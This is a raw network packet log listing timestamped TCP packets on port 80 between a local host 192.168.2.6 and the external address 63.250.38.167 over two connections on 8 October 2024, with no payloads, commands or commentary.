Oct 8, 2024 11:31:34.805046082 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.805059910 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.805066109 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.805073977 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.805085897 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.805102110 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.805104971 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.805110931 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.805119991 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.805133104 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.805150032 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.805152893 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.805166960 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.805177927 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.805181026 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.805197954 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.805208921 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.805219889 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.805226088 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.805233955 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.805246115 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.805247068 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.805258036 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.805269957 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.805274963 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.805298090 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.805454969 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.897959948 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898036003 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898072004 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898107052 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898156881 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.898163080 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898199081 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898216009 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.898262978 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898324013 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898345947 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898360968 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.898365974 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898376942 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898391962 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.898396969 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898411036 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898422956 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898426056 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.898435116 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898447037 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898447037 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.898458004 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898469925 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.898472071 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898484945 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898495913 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898499966 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.898514032 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898534060 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898540020 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.898550987 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898560047 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.898565054 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898577929 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.898578882 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898591042 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898602962 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898617029 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898619890 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.898628950 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898639917 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898650885 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898659945 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.898659945 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.898667097 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898679972 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898689032 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.898691893 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898708105 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898721933 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.898725033 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898737907 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898750067 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898752928 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.898761988 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898766994 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.898775101 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898787975 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898798943 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898802996 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.898812056 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898824930 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898840904 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898840904 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.898840904 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.898854017 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898866892 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898884058 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.898894072 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898900032 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.898927927 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.898967981 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899017096 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899049044 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.899054050 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899108887 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899159908 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899187088 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.899193048 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899245977 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899279118 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899281025 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.899315119 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.899316072 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899349928 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899380922 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.899436951 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899488926 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899539948 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899570942 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.899571896 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899607897 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899645090 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899657965 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.899696112 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899710894 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.899729013 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899760962 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.899763107 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899799109 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899832010 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.899832964 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899867058 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899899960 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899931908 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.899964094 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.899966955 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900000095 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900032043 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.900032043 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900065899 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900098085 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900099039 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.900130987 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900162935 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.900165081 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900197983 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900228977 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.900232077 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900266886 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900296926 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.900302887 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900341034 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900372028 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.900373936 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900408030 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900441885 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.900441885 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900477886 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900511980 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900542974 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900544882 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.900577068 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900609970 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900616884 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.900639057 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.900641918 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900677919 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900711060 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900712013 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.900747061 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900779009 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900813103 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900820017 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.900845051 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.900845051 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900885105 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900917053 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900949955 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.900950909 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.900981903 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.900984049 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.901017904 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.901050091 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.901051044 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.901086092 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.901118040 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.901148081 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.901150942 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.901185036 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.901185989 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.901218891 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.901248932 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.901251078 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.901388884 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.992317915 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.992340088 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.992358923 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.992372036 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.992384911 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.992394924 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.992399931 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.992408037 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.992423058 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.992446899 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.992446899 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.994102001 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:38.682163954 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:42.580369949 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:42.742911100 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:42.743072033 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:42.743499041 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:42.748234034 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.704097033 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.704111099 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.704123020 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.704169035 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.704204082 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.704214096 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.704222918 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.704236031 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.704247952 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.704257011 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.704267979 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.704277992 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.704297066 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.704298019 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.704329014 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.704333067 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.704480886 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.709264040 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.709275007 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.709285975 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.709362984 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.709362984 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.709549904 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.709558964 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.709569931 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.709580898 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.709655046 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.709655046 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.710347891 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.710357904 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.710369110 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.710378885 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.710434914 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.710434914 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.711111069 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.711163044 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.711173058 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.711184978 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.711253881 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.711253881 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.711945057 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.711956024 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.711967945 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.712018967 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.714191914 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.714234114 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.714268923 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.714375019 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.714426994 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.714679956 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.714771032 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.714845896 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.715080023 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.715104103 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.715209961 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.715476036 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.715533972 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.715605021 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.715881109 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.715946913 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.715997934 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.716335058 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.716346979 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.716358900 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.716430902 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.716891050 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.716995001 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.717082977 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.717165947 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.717211962 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.719007015 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.719059944 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.719072104 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.719083071 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.719130039 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.719130039 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.719261885 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.719274044 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.719288111 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.719300032 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.719414949 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.719414949 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.719639063 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.719650984 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.719661951 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.719674110 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.719722033 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.719722033 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.720048904 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.720062971 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.720077038 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.720088005 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.720122099 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.720133066 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.720415115 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.720429897 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.720442057 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.720453978 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.720480919 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.720500946 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.720797062 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.720808029 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.720818996 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.720829964 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.720875978 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.720875978 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.721256971 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.721271038 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.721282959 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.721293926 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.721347094 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.721347094 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.721816063 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.721867085 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.721879005 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.721889973 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.721934080 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.722009897 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.722021103 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.722032070 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.722059965 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.722059965 CEST	49999	80	192.168.2.6	63.250.38.167
